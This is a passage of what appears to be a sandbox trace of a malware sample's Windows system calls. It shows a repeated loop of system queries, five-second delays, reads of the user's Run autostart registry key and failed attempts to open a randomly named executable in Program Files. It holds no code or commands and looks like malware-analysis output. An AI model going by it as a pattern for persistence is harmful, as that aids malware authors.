RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.160] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.168] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.168] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.168] NtClose (Handle=0x14c) returned 0x0 [0248.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.169] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.169] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.169] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.169] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.169] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.249] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.264] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.264] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.264] NtClose (Handle=0x14c) returned 0x0 [0248.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.264] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.264] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.264] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.265] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.358] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.372] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.372] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.372] NtClose (Handle=0x14c) returned 0x0 [0248.372] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.372] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.373] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.373] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.373] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.455] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.465] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.465] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.465] NtClose (Handle=0x14c) returned 0x0 [0248.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.465] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.465] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.465] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.465] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.465] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.560] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.574] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.574] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.574] NtClose (Handle=0x14c) returned 0x0 [0248.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.574] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.574] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.574] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.574] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.574] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.665] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.675] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.675] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.675] NtClose (Handle=0x14c) returned 0x0 [0248.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.675] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.676] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.676] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.676] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.676] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.758] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.776] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.776] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.776] NtClose (Handle=0x14c) returned 0x0 [0248.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.776] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.776] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.776] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.776] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0248.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0248.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0248.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0248.859] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0248.870] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0248.871] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0248.871] NtClose (Handle=0x14c) returned 0x0 [0248.871] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0248.871] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0248.871] RtlFreeHeap 